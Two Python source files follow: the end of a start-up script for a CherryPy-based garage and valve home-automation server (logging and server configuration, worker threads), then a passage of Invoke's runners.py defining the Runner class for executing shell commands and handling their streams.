# logrotate_handler=logging.handlers.RotatingFileHandler("log/mitzon.log",maxBytes=10485760,backupCount=20,encoding=None, delay=0)
# logging.basicConfig(level=logging.INFO,
# format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
# handlers=[logrotate_handler,
# logging.StreamHandler()])
#
# logrotate_handler.doRollover() #Roolover logs on startup
server_config = {
'server.socket_host': garageHandler.server_socket_host,
'server.socket_port': garageHandler.server_socket_port,
'server.ssl_module': garageHandler.server_ssl_module,
#'server.ssl_module': 'pyopenssl',
'server.ssl_certificate': garageHandler.server_ssl_certificate,
'server.ssl_private_key': garageHandler.server_ssl_private_key,
'tools.response_headers.on': False,
'tools.response_headers.headers': [('Content-Type', 'text/plain'),
('Strict-Transport-Security', 'max-age=31536000'),
('X-Frame-Options', 'DENY'), # [XFO]
('X-XSS-Protection', '1; mode=block'), # [LUH]
('Content-Security-Policy', _csp), # [CSP]
('X-Content-Security-Policy', _csp), # [CSP]
('X-Webkit-CSP', _csp), # [CSP]
('X-Content-Type-Options', 'nosniff') # [LUH]
],
'tools.sessions.secure': True,
'tools.request_headers.on': False,
'tools.staticdir.on': True,
'tools.staticdir.dir': "log",
# 'log.access_file': 'log/garage_cherrypy_access.log',
# 'log.error_file': 'log/garage_cherrypy_error.log',
# 'log.screen': True,
# 'tools.sessions.on': True,
'engine.autoreload_on': False,
}
garage_backend_conf = {
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.sessions.on': True,
'tools.response_headers.on': False,
'tools.response_headers.headers': [('Content-Type', 'text/plain')],
}
}
LOG_CONF = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'void': {
'format': 'void %(asctime)s %(name)s: %(message)s'
},
'standard': {
'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s'
},
},
'handlers': {
'Garage': { #{"log/mitzon.log", maxBytes=, backupCount=20, encoding=None,delay=0, logging.handlers.RotatingFileHandler
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.FileHandler"),
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'standard',
'filename': 'log/mitzon.log',
'maxBytes': 104857600,
'backupCount': 20,
'encoding': 'utf8'
},
'cherrypy_console': {
'level': 'INFO',
'class': 'logging.StreamHandler',
'formatter': 'standard',
'stream': 'ext://sys.stdout'
},
'cherrypy_access': {
'level': 'INFO',
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'standard',
'filename': 'log/garage_cherrypy_access.log',
'maxBytes': 10485760,
'backupCount': 10,
'encoding': 'utf8'
},
'cherrypy_error': {
'level': 'INFO',
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'standard',
'filename': 'log/garage_cherrypy_error.log',
'maxBytes': 10485760,
'backupCount': 10,
'encoding': 'utf8'
},
},
'loggers': {
'Garage.AlertManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.AlertManager"),
'propagate': True
},
'Garage.ConfigManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.ConfigManager"),
'propagate': True
},
'Garage.DeviceManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.DeviceManager"),
'propagate': True
},
'Garage.GarageDoor': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.GarageDoor"),
'propagate': True
},
'Garage.GarageManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.GarageManager"),
'propagate': True
},
'Valve.Valve': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Valve.Valve"),
'propagate': True
},
'Valve.ValveManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Valve.ValveManager"),
'propagate': True
},
'Garage.Light': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.Light"),
'propagate': True
},
'Garage.NotificationManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.NotificationManager"),
'propagate': True
},
'Garage.Sensor': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.Sensor"),
'propagate': True
},
'Garage.mitzonURLCmdProcessor': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Garage.mitzonURLCmdProcessor"),
'propagate': True
},
'Weather.WeatherManager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "Weather.WeatherManager"),
'propagate': True
},
'nanpy': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "nanpy"),
'propagate': True
},
'nanpy.serialmanager': {
'handlers': ['Garage'],
'level': garageHandler.config_handler.getConfigParam("GARAGE_LOG_LEVEL", "nanpy.serialmanager"),
'propagate': True
},
# # Only Log Request and reponses to file. Screen is the next block!
'cherrypy.access': {
'handlers': ['cherrypy_access'],
'level': 'INFO',
'propagate': False
},
# # Log Requests to screen
# 'cherrypy.access': {
# 'handlers': ['cherrypy_console', 'cherrypy_access'],
# 'level': 'INFO',
# 'propagate': False
# },
'cherrypy.error': {
'handlers': ['cherrypy_console', 'cherrypy_error'],
'level': 'INFO',
'propagate': False
},
}
}
logging.config.dictConfig(LOG_CONF)
# Say starting and force a log rotation
log=logging.getLogger('Mitzon.mitzonURLCmdProcessor')
logh=logging._handlers.get('Garage')
logh.doRollover()
log.info("Starting Mitzon...")
'''Subscriber - Dispatcher '''
command_queue = Queue()
response_queue = Queue()
try:
cherrypy.config.update(server_config)
# dispatch_queue = Queue()
# garageHandler = mitzonURLCmdProcessor(dispatch_queue)
# pub1 = Pub1(dispatch_queue)
sub1 = DeviceManager()
sub2 = AlertManager()
thread_command_queue = Thread(target=command_queue_fn, name='cmd_queue', args=(command_queue,response_queue,))
thread_dispatcher = Thread(target=dispatcher_fn, name='dispath_queue',
args=(dispatch_queue, command_queue, [sub1, sub2]))
garage_manager_handler = GarageManager()
thread_garage_manager = Thread(target=GarageManager.monitor,
args=(garage_manager_handler,), name='garage_manager',
daemon=True)
mitzon_valve_handler = ValveManager()
thread_valve_manager = Thread(target=ValveManager.monitor,
args=(mitzon_valve_handler,), name='valve_manager',
daemon=True)
mitzon_weather_handler = WeatherManager()
thread_weather_manager = Thread(target=WeatherManager.monitor,
args=(mitzon_weather_handler,), name='weather_manager',
daemon=True)
notification_manager_handler = NotificationManager()
thread_notification_manager = Thread(target=NotificationManager.processnotif,
args=(notification_manager_handler,), name='notification_manager',
daemon=True)
thread_command_queue.start()
thread_dispatcher.start()
thread_garage_manager.start()
thread_valve_manager.start()
thread_weather_manager.start()
thread_notification_manager.start()
cherrypy.quickstart(garageHandler, '/',garage_backend_conf)
except Exception:
log.error("Cherrypy quickstart fail !")
traceback.print_exc()
os._exit(-1)
dispatch_queue.put(None)
command_queue.put(None)
# thread_command_queue.join(THREAD_TIMEOUTS)
# thread_dispatcher.join(THREAD_TIMEOUTS)
# thread_garage_manager.join(THREAD_TIMEOUTS)
cherrypy.engine.exit()
os._exit(0)
|
runners.py
|
# -*- coding: utf-8 -*-
import locale
import os
import struct
from subprocess import Popen, PIPE
import sys
import threading
import time
from .util import six
# Import some platform-specific things at top level so they can be mocked for
# tests.
try:
import pty
except ImportError:
pty = None
try:
import fcntl
except ImportError:
fcntl = None
try:
import termios
except ImportError:
termios = None
from .exceptions import (
UnexpectedExit, Failure, ThreadException, WatcherError,
)
from .platform import (
WINDOWS, pty_size, character_buffered, ready_for_reading, bytes_to_read,
)
from .util import has_fileno, isatty, ExceptionHandlingThread, encode_output
class Runner(object):
"""
Partially-abstract core command-running API.
This class is not usable by itself and must be subclassed, implementing a
number of methods such as `start`, `wait` and `returncode`. For a subclass
implementation example, see the source code for `.Local`.
"""
read_chunk_size = 1000
input_sleep = 0.01
def __init__(self, context):
"""
Create a new runner with a handle on some `.Context`.
:param context:
a `.Context` instance, used to transmit default options and provide
access to other contextualized information (e.g. a remote-oriented
`.Runner` might want a `.Context` subclass holding info about
hostnames and ports.)
.. note::
The `.Context` given to `.Runner` instances **must** contain
default config values for the `.Runner` class in question. At a
minimum, this means values for each of the default
`.Runner.run` keyword arguments such as ``echo`` and ``warn``.
:raises exceptions.ValueError:
if not all expected default values are found in ``context``.
"""
#: The `.Context` given to the same-named argument of `__init__`.
self.context = context
#: A `threading.Event` signaling program completion.
#:
#: Typically set after `wait` returns. Some IO mechanisms rely on this
#: to know when to exit an infinite read loop.
self.program_finished = threading.Event()
# I wish Sphinx would organize all class/instance attrs in the same
# place. If I don't do this here, it goes 'class vars -> __init__
# docstring -> instance vars' :( TODO: consider just merging class and
# __init__ docstrings, though that's annoying too.
#: How many bytes (at maximum) to read per iteration of stream reads.
self.read_chunk_size = self.__class__.read_chunk_size
# Ditto re: declaring this in 2 places for doc reasons.
#: How many seconds to sleep on each iteration of the stdin read loop
#: and other otherwise-fast loops.
self.input_sleep = self.__class__.input_sleep
#: Whether pty fallback warning has been emitted.
self.warned_about_pty_fallback = False
#: A list of `.StreamWatcher` instances for use by `respond`. Is filled
#: in at runtime by `run`.
self.watchers = []
def run(self, command, **kwargs):
"""
Execute ``command``, returning an instance of `Result`.
.. note::
All kwargs will default to the values found in this instance's
`~.Runner.context` attribute, specifically in its configuration's
``run`` subtree (e.g. ``run.echo`` provides the default value for
the ``echo`` keyword, etc). The base default values are described
in the parameter list below.
:param str command: The shell command to execute.
:param str shell:
Which shell binary to use. Default: ``/bin/bash`` (on Unix;
``COMSPEC`` or ``cmd.exe`` on Windows.)
:param bool warn:
Whether to warn and continue, instead of raising
`.UnexpectedExit`, when the executed command exits with a
nonzero status. Default: ``False``.
.. note::
This setting has no effect on exceptions, which will still be
raised, typically bundled in `.ThreadException` objects if they
were raised by the IO worker threads.
Similarly, `.WatcherError` exceptions raised by
`.StreamWatcher` instances will also ignore this setting, and
will usually be bundled inside `.Failure` objects (in order to
preserve the execution context).
:param hide:
Allows the caller to disable ``run``'s default behavior of copying
the subprocess' stdout and stderr to the controlling terminal.
Specify ``hide='out'`` (or ``'stdout'``) to hide only the stdout
stream, ``hide='err'`` (or ``'stderr'``) to hide only stderr, or
``hide='both'`` (or ``True``) to hide both streams.
The default value is ``None``, meaning to print everything;
``False`` will also disable hiding.
.. note::
Stdout and stderr are always captured and stored in the
``Result`` object, regardless of ``hide``'s value.
.. note::
``hide=True`` will also override ``echo=True`` if both are
given (either as kwargs or via config/CLI).
:param bool pty:
By default, ``run`` connects directly to the invoked process and
reads its stdout/stderr streams. Some programs will buffer (or even
behave) differently in this situation compared to using an actual
terminal or pseudoterminal (pty). To use a pty instead of the
default behavior, specify ``pty=True``.
.. warning::
Due to their nature, ptys have a single output stream, so the
ability to tell stdout apart from stderr is **not possible**
when ``pty=True``. As such, all output will appear on
``out_stream`` (see below) and be captured into the ``stdout``
result attribute. ``err_stream`` and ``stderr`` will always be
empty when ``pty=True``.
:param bool fallback:
Controls auto-fallback behavior re: problems offering a pty when
``pty=True``. Whether this has any effect depends on the specific
`Runner` subclass being invoked. Default: ``True``.
:param bool echo:
Controls whether `.run` prints the command string to local stdout
prior to executing it. Default: ``False``.
.. note::
``hide=True`` will override ``echo=True`` if both are given.
:param dict env:
            By default, subprocesses receive a copy of Invoke's own environment
(i.e. ``os.environ``). Supply a dict here to update that child
environment.
For example, ``run('command', env={'PYTHONPATH':
'/some/virtual/env/maybe'})`` would modify the ``PYTHONPATH`` env
var, with the rest of the child's env looking identical to the
parent.
.. seealso:: ``replace_env`` for changing 'update' to 'replace'.
:param bool replace_env:
When ``True``, causes the subprocess to receive the dictionary
given to ``env`` as its entire shell environment, instead of
updating a copy of ``os.environ`` (which is the default behavior).
Default: ``False``.
:param str encoding:
Override auto-detection of which encoding the subprocess is using
for its stdout/stderr streams (which defaults to the return value
of `default_encoding`).
:param out_stream:
A file-like stream object to which the subprocess' standard output
should be written. If ``None`` (the default), ``sys.stdout`` will
be used.
:param err_stream:
Same as ``out_stream``, except for standard error, and defaulting
to ``sys.stderr``.
:param in_stream:
            A file-like stream object to be used as the subprocess' standard
input. If ``None`` (the default), ``sys.stdin`` will be used.
If ``False``, will disable stdin mirroring entirely (though other
functionality which writes to the subprocess' stdin, such as
autoresponding, will still function.) Disabling stdin mirroring can
help when ``sys.stdin`` is a misbehaving non-stream object, such as
under test harnesses or headless command runners.
:param watchers:
A list of `.StreamWatcher` instances which will be used to scan the
program's ``stdout`` or ``stderr`` and may write into its ``stdin``
(typically ``str`` or ``bytes`` objects depending on Python
version) in response to patterns or other heuristics.
See :doc:`/concepts/watchers` for details on this functionality.
Default: ``[]``.
:param bool echo_stdin:
Whether to write data from ``in_stream`` back to ``out_stream``.
In other words, in normal interactive usage, this parameter
controls whether Invoke mirrors what you type back to your
terminal.
By default (when ``None``), this behavior is triggered by the
following:
* Not using a pty to run the subcommand (i.e. ``pty=False``),
as ptys natively echo stdin to stdout on their own;
* And when the controlling terminal of Invoke itself (as per
``in_stream``) appears to be a valid terminal device or TTY.
(Specifically, when `~invoke.util.isatty` yields a ``True``
result when given ``in_stream``.)
.. note::
This property tends to be ``False`` when piping another
program's output into an Invoke session, or when running
Invoke within another program (e.g. running Invoke from
itself).
If both of those properties are true, echoing will occur; if either
is false, no echoing will be performed.
When not ``None``, this parameter will override that auto-detection
and force, or disable, echoing.
:returns:
`Result`, or a subclass thereof.
:raises:
`.UnexpectedExit`, if the command exited nonzero and
``warn`` was ``False``.
:raises:
`.Failure`, if the command didn't even exit cleanly, e.g. if a
`.StreamWatcher` raised `.WatcherError`.
:raises:
`.ThreadException` (if the background I/O threads encountered
exceptions other than `.WatcherError`).
"""
try:
return self._run_body(command, **kwargs)
finally:
self.stop()
def _run_body(self, command, **kwargs):
# Normalize kwargs w/ config
opts, out_stream, err_stream, in_stream = self._run_opts(kwargs)
shell = opts['shell']
# Environment setup
env = self.generate_env(opts['env'], opts['replace_env'])
# Echo running command
if opts['echo']:
print("\033[1;37m{}\033[0m".format(command))
# Start executing the actual command (runs in background)
self.start(command, shell, env)
# Arrive at final encoding if neither config nor kwargs had one
self.encoding = opts['encoding'] or self.default_encoding()
# Set up IO thread parameters (format - body_func: {kwargs})
stdout, stderr = [], []
thread_args = {
self.handle_stdout: {
'buffer_': stdout,
'hide': 'stdout' in opts['hide'],
'output': out_stream,
},
}
# After opt processing above, in_stream will be a real stream obj or
# False, so we can truth-test it. We don't even create a stdin-handling
# thread if it's False, meaning user indicated stdin is nonexistent or
# problematic.
if in_stream:
thread_args[self.handle_stdin] = {
'input_': in_stream,
'output': out_stream,
'echo': opts['echo_stdin'],
}
if not self.using_pty:
thread_args[self.handle_stderr] = {
'buffer_': stderr,
'hide': 'stderr' in opts['hide'],
'output': err_stream,
}
# Kick off IO threads
self.threads = {}
exceptions = []
for target, kwargs in six.iteritems(thread_args):
t = ExceptionHandlingThread(target=target, kwargs=kwargs)
self.threads[target] = t
t.start()
# Wait for completion, then tie things off & obtain result
# And make sure we perform that tying off even if things asplode.
exception = None
while True:
try:
self.wait()
break # done waiting!
# NOTE: we handle all this now instead of at
# actual-exception-handling time because otherwise the stdout/err
# reader threads may block until the subprocess exits.
# TODO: honor other signals sent to our own process and transmit
# them to the subprocess before handling 'normally'.
except KeyboardInterrupt as e:
self.send_interrupt(e)
# NOTE: no break; we want to return to self.wait()
except BaseException as e: # Want to handle SystemExit etc still
# Store exception for post-shutdown reraise
exception = e
# Break out of return-to-wait() loop - we want to shut down
break
# Inform stdin-mirroring worker to stop its eternal looping
self.program_finished.set()
# Join threads, setting a timeout if necessary
for target, thread in six.iteritems(self.threads):
thread.join(self._thread_timeout(target))
e = thread.exception()
if e is not None:
exceptions.append(e)
# If we got a main-thread exception while wait()ing, raise it now that
# we've closed our worker threads.
if exception is not None:
raise exception
# Strip out WatcherError from any thread exceptions; they are bundled
# into Failure handling at the end.
watcher_errors = []
thread_exceptions = []
for exception in exceptions:
real = exception.value
if isinstance(real, WatcherError):
watcher_errors.append(real)
else:
thread_exceptions.append(exception)
# If any exceptions appeared inside the threads, raise them now as an
# aggregate exception object.
if thread_exceptions:
raise ThreadException(thread_exceptions)
# At this point, we had enough success that we want to be returning or
# raising detailed info about our execution; so we generate a Result.
stdout = ''.join(stdout)
stderr = ''.join(stderr)
if WINDOWS:
# "Universal newlines" - replace all standard forms of
# newline with \n. This is not technically Windows related
# (\r as newline is an old Mac convention) but we only apply
# the translation for Windows as that's the only platform
# it is likely to matter for these days.
stdout = stdout.replace("\r\n", "\n").replace("\r", "\n")
stderr = stderr.replace("\r\n", "\n").replace("\r", "\n")
# Get return/exit code, unless there were WatcherErrors to handle.
# NOTE: In that case, returncode() may block waiting on the process
# (which may be waiting for user input). Since most WatcherError
# situations lack a useful exit code anyways, skipping this doesn't
# really hurt any.
exited = None if watcher_errors else self.returncode()
# Obtain actual result
result = self.generate_result(
command=command,
shell=shell,
env=env,
stdout=stdout,
stderr=stderr,
exited=exited,
pty=self.using_pty,
hide=opts['hide'],
encoding=self.encoding,
)
# Any presence of WatcherError from the threads indicates a watcher was
# upset and aborted execution; make a generic Failure out of it and
# raise that.
if watcher_errors:
# TODO: ambiguity exists if we somehow get WatcherError in *both*
# threads...as unlikely as that would normally be.
raise Failure(result, reason=watcher_errors[0])
if not (result or opts['warn']):
raise UnexpectedExit(result)
return result
def _run_opts(self, kwargs):
"""
Unify `run` kwargs with config options to arrive at local options.
:returns:
Four-tuple of ``(opts_dict, stdout_stream, stderr_stream,
stdin_stream)``.
"""
opts = {}
for key, value in six.iteritems(self.context.config.run):
runtime = kwargs.pop(key, None)
opts[key] = value if runtime is None else runtime
# Handle invalid kwarg keys (anything left in kwargs).
# Act like a normal function would, i.e. TypeError
if kwargs:
err = "run() got an unexpected keyword argument '{}'"
raise TypeError(err.format(list(kwargs.keys())[0]))
# If hide was True, turn off echoing
if opts['hide'] is True:
opts['echo'] = False
# Then normalize 'hide' from one of the various valid input values,
# into a stream-names tuple.
opts['hide'] = normalize_hide(opts['hide'])
# Derive stream objects
out_stream = opts['out_stream']
if out_stream is None:
out_stream = sys.stdout
err_stream = opts['err_stream']
if err_stream is None:
err_stream = sys.stderr
in_stream = opts['in_stream']
if in_stream is None:
in_stream = sys.stdin
# Determine pty or no
self.using_pty = self.should_use_pty(opts['pty'], opts['fallback'])
if opts['watchers']:
self.watchers = opts['watchers']
return opts, out_stream, err_stream, in_stream
def _thread_timeout(self, target):
# Add a timeout to out/err thread joins when it looks like they're not
# dead but their counterpart is dead; this indicates issue #351 (fixed
# by #432) where the subproc may hang because its stdout (or stderr) is
# no longer being consumed by the dead thread (and a pipe is filling
# up.) In that case, the non-dead thread is likely to block forever on
# a `recv` unless we add this timeout.
if target == self.handle_stdin:
return None
opposite = self.handle_stderr
if target == self.handle_stderr:
opposite = self.handle_stdout
if opposite in self.threads and self.threads[opposite].is_dead:
return 1
return None
def generate_result(self, **kwargs):
"""
Create & return a suitable `Result` instance from the given ``kwargs``.
Subclasses may wish to override this in order to manipulate things or
generate a `Result` subclass (e.g. ones containing additional metadata
besides the default).
"""
return Result(**kwargs)
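# A hypothetical sketch of the kind of override described above; ``TimedResult``,
# ``TimedLocal`` and the ``duration`` attribute are illustrative names only:
#
#     class TimedResult(Result):
#         def __init__(self, duration=None, **kwargs):
#             super(TimedResult, self).__init__(**kwargs)
#             self.duration = duration
#
#     class TimedLocal(Local):
#         def generate_result(self, **kwargs):
#             # 'duration' would have to be measured elsewhere by this subclass.
#             return TimedResult(duration=getattr(self, "duration", None), **kwargs)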
def read_proc_output(self, reader):
"""
Iteratively read & decode bytes from a subprocess' out/err stream.
:param reader:
A literal reader function/partial, wrapping the actual stream
object in question, which takes a number of bytes to read, and
returns that many bytes (or ``None``).
``reader`` should be a reference to either `read_proc_stdout` or
`read_proc_stderr`, which perform the actual, platform/library
specific read calls.
:returns:
A generator yielding Unicode strings (`unicode` on Python 2; `str`
on Python 3).
Specifically, each resulting string is the result of decoding
`read_chunk_size` bytes read from the subprocess' out/err stream.
"""
# NOTE: Typically, reading from any stdout/err (local, remote or
# otherwise) can be thought of as "read until you get nothing back".
# This is preferable over "wait until an out-of-band signal claims the
# process is done running" because sometimes that signal will appear
# before we've actually read all the data in the stream (i.e.: a race
# condition).
while True:
data = reader(self.read_chunk_size)
if not data:
break
yield self.decode(data)
def write_our_output(self, stream, string):
"""
Write ``string`` to ``stream``.
Also calls ``.flush()`` on ``stream`` to ensure that real terminal
streams don't buffer.
:param stream:
A file-like stream object, mapping to the ``out_stream`` or
``err_stream`` parameters of `run`.
:param string: A Unicode string object.
:returns: ``None``.
"""
stream.write(encode_output(string, self.encoding))
stream.flush()
def _handle_output(self, buffer_, hide, output, reader):
# TODO: store un-decoded/raw bytes somewhere as well...
for data in self.read_proc_output(reader):
# Echo to local stdout if necessary
# TODO: should we rephrase this as "if you want to hide, give me a
# dummy output stream, e.g. something like /dev/null"? Otherwise, a
# combo of 'hide=stdout' + 'here is an explicit out_stream' means
# out_stream is never written to, and that seems...odd.
if not hide:
self.write_our_output(stream=output, string=data)
# Store in shared buffer so main thread can do things with the
# result after execution completes.
# NOTE: this is threadsafe insofar as no reading occurs until after
# the thread is join()'d.
buffer_.append(data)
# Run our specific buffer through the autoresponder framework
self.respond(buffer_)
def handle_stdout(self, buffer_, hide, output):
"""
Read process' stdout, storing into a buffer & printing/parsing.
Intended for use as a thread target. Only terminates when all stdout
from the subprocess has been read.
:param buffer_: The capture buffer shared with the main thread.
:param bool hide: Whether or not to replay data into ``output``.
:param output:
Output stream (file-like object) to write data into when not
hiding.
:returns: ``None``.
"""
self._handle_output(
buffer_,
hide,
output,
reader=self.read_proc_stdout,
)
def handle_stderr(self, buffer_, hide, output):
"""
Read process' stderr, storing into a buffer & printing/parsing.
Identical to `handle_stdout` except for the stream read from; see its
docstring for API details.
"""
self._handle_output(
buffer_,
hide,
output,
reader=self.read_proc_stderr,
)
def read_our_stdin(self, input_):
"""
Read & decode bytes from a local stdin stream.
:param input_:
Actual stream object to read from. Maps to ``in_stream`` in `run`,
so will often be ``sys.stdin``, but might be any stream-like
object.
:returns:
A Unicode string, the result of decoding the read bytes (this might
be the empty string if the pipe has closed/reached EOF); or
``None`` if stdin wasn't ready for reading yet.
"""
# TODO: consider moving the character_buffered contextmanager call in
# here? Downside is it would be flipping those switches for every byte
# read instead of once per session, which could be costly (?).
bytes_ = None
if ready_for_reading(input_):
bytes_ = input_.read(bytes_to_read(input_))
# Decode if it appears to be binary-type. (From real terminal
# streams, usually yes; from file-like objects, often no.)
if bytes_ and isinstance(bytes_, six.binary_type):
# TODO: will decoding 1 byte at a time break multibyte
# character encodings? How to square interactivity with that?
bytes_ = self.decode(bytes_)
return bytes_
def handle_stdin(self, input_, output, echo):
"""
Read local stdin, copying into process' stdin as necessary.
Intended for use as a thread target.
.. note::
Because real terminal stdin streams have no well-defined "end", if
such a stream is detected (based on existence of a callable
``.fileno()``) this method will wait until `program_finished` is
set, before terminating.
When the stream doesn't appear to be from a terminal, the same
semantics as `handle_stdout` are used - the stream is simply
``read()`` from until it returns an empty value.
:param input_: Stream (file-like object) from which to read.
:param output: Stream (file-like object) to which echoing may occur.
:param bool echo: User override option for stdin-stdout echoing.
:returns: ``None``.
"""
# TODO: reinstate lock/whatever thread logic from fab v1 which prevents
# reading from stdin while other parts of the code are prompting for
# runtime passwords? (search for 'input_enabled')
# TODO: fabric#1339 is strongly related to this, if it's not literally
# exposing some regression in Fabric 1.x itself.
with character_buffered(input_):
while True:
data = self.read_our_stdin(input_)
if data:
# Mirror what we just read to process' stdin.
# We perform an encode so Python 3 gets bytes (streams +
# str's in Python 3 == no bueno) but skip the decode step,
# since there's presumably no need (nobody's interacting
# with this data programmatically).
self.write_proc_stdin(data)
# Also echo it back to local stdout (or whatever
# out_stream is set to) when necessary.
if echo is None:
echo = self.should_echo_stdin(input_, output)
if echo:
self.write_our_output(stream=output, string=data)
# Empty string/char/byte != None. Can't just use 'else' here.
elif data is not None:
# When reading from file-like objects that aren't "real"
# terminal streams, an empty byte signals EOF.
break
# Dual all-done signals: program being executed is done
# running, *and* we don't seem to be reading anything out of
# stdin. (NOTE: If we only test the former, we may encounter
# race conditions re: unread stdin.)
if self.program_finished.is_set() and not data:
break
# Take a nap so we're not chewing CPU.
time.sleep(self.input_sleep)
def should_echo_stdin(self, input_, output):
"""
Determine whether data read from ``input_`` should echo to ``output``.
Used by `handle_stdin`; tests attributes of ``input_`` and ``output``.
:param input_: Input stream (file-like object).
:param output: Output stream (file-like object).
:returns: A ``bool``.
"""
return (not self.using_pty) and isatty(input_)
def respond(self, buffer_):
"""
Write to the program's stdin in response to patterns in ``buffer_``.
The patterns and responses are driven by the `.StreamWatcher` instances
from the ``watchers`` kwarg of `run` - see :doc:`/concepts/watchers`
for a conceptual overview.
:param buffer_:
The capture buffer for this thread's particular IO stream.
:returns: ``None``.
"""
# Join buffer contents into a single string; without this,
# StreamWatcher subclasses can't do things like iteratively scan for
# pattern matches.
# NOTE: using string.join should be "efficient enough" for now, re:
# speed and memory use. Should that become false, consider using
# StringIO or cStringIO (tho the latter doesn't do Unicode well?) which
# is apparently even more efficient.
stream = u''.join(buffer_)
for watcher in self.watchers:
for response in watcher.submit(stream):
self.write_proc_stdin(response)
def generate_env(self, env, replace_env):
"""
Return a suitable environment dict based on user input & behavior.
:param dict env: Dict supplying overrides or full env, depending.
:param bool replace_env:
Whether ``env`` updates, or is used in place of, the value of
`os.environ`.
:returns: A dictionary of shell environment vars.
"""
return env if replace_env else dict(os.environ, **env)
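# For illustration, assuming os.environ == {"PATH": "/usr/bin"}:
#   generate_env({"FOO": "bar"}, replace_env=False) -> {"PATH": "/usr/bin", "FOO": "bar"}
#   generate_env({"FOO": "bar"}, replace_env=True)  -> {"FOO": "bar"}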
def should_use_pty(self, pty, fallback):
"""
Should execution attempt to use a pseudo-terminal?
:param bool pty:
Whether the user explicitly asked for a pty.
:param bool fallback:
Whether falling back to non-pty execution should be allowed, in
situations where ``pty=True`` but a pty could not be allocated.
"""
# NOTE: fallback not used: no falling back implemented by default.
return pty
@property
def has_dead_threads(self):
"""
Detect whether any IO threads appear to have terminated unexpectedly.
Used during process-completion waiting (in `wait`) to ensure we don't
deadlock our child process if our IO processing threads have
errored/died.
:returns:
``True`` if any threads appear to have terminated with an
exception, ``False`` otherwise.
"""
return any(x.is_dead for x in self.threads.values())
def wait(self):
"""
Block until the running command appears to have exited.
:returns: ``None``.
"""
while True:
proc_finished = self.process_is_finished
dead_threads = self.has_dead_threads
if proc_finished or dead_threads:
break
time.sleep(self.input_sleep)
def write_proc_stdin(self, data):
"""
Write encoded ``data`` to the running process' stdin.
:param data: A Unicode string.
:returns: ``None``.
"""
# Encode always, then request implementing subclass to perform the
# actual write to subprocess' stdin.
self._write_proc_stdin(data.encode(self.encoding))
def decode(self, data):
"""
Decode some ``data`` bytes, returning Unicode.
"""
# NOTE: yes, this is a 1-liner. The point is to make it much harder to
# forget to use 'replace' when decoding :)
return data.decode(self.encoding, 'replace')
@property
def process_is_finished(self):
"""
Determine whether our subprocess has terminated.
.. note::
The implementation of this method should be nonblocking, as it is
used within a query/poll loop.
:returns:
``True`` if the subprocess has finished running, ``False``
otherwise.
"""
raise NotImplementedError
def start(self, command, shell, env):
"""
Initiate execution of ``command`` (via ``shell``, with ``env``).
Typically this means use of a forked subprocess or requesting start of
execution on a remote system.
In most cases, this method will also set subclass-specific member
variables used in other methods such as `wait` and/or `returncode`.
"""
raise NotImplementedError
def read_proc_stdout(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stdout stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
"""
raise NotImplementedError
def read_proc_stderr(self, num_bytes):
"""
Read ``num_bytes`` from the running process' stderr stream.
:param int num_bytes: Number of bytes to read at maximum.
:returns: A string/bytes object.
"""
raise NotImplementedError
def _write_proc_stdin(self, data):
"""
Write ``data`` to running process' stdin.
This should never be called directly; it's for subclasses to implement.
See `write_proc_stdin` for the public API call.
:param data: Already-encoded byte data suitable for writing.
:returns: ``None``.
"""
raise NotImplementedError
def default_encoding(self):
"""
Return a string naming the expected encoding of subprocess streams.
This return value should be suitable for use by encode/decode methods.
"""
# TODO: probably wants to be 2 methods, one for local and one for
# subprocess. For now, good enough to assume both are the same.
#
# Based on some experiments there is an issue with
# `locale.getpreferredencoding(do_setlocale=False)` in Python 2.x on
# Linux and OS X, and `locale.getpreferredencoding(do_setlocale=True)`
# triggers some global state changes. (See #274 for discussion.)
encoding = locale.getpreferredencoding(False)
if six.PY2 and not WINDOWS:
default = locale.getdefaultlocale()[1]
if default is not None:
encoding = default
return encoding
def send_interrupt(self, interrupt):
"""
Submit an interrupt signal to the running subprocess.
In almost all implementations, the default behavior is what will be
desired: submit ``\x03`` to the subprocess' stdin pipe. However, we
leave this as a public method in case this default needs to be
augmented or replaced.
:param interrupt:
The locally-sourced ``KeyboardInterrupt`` causing the method call.
:returns: ``None``.
"""
self.write_proc_stdin(u'\x03')
def returncode(self):
"""
Return the numeric return/exit code resulting from command execution.
:returns: `int`
"""
raise NotImplementedError
def stop(self):
"""
Perform final cleanup, if necessary.
This method is called within a ``finally`` clause inside the main `run`
method. Depending on the subclass, it may be a no-op, or it may do
things such as close network connections or open files.
:returns: ``None``
"""
raise NotImplementedError
class Local(Runner):
"""
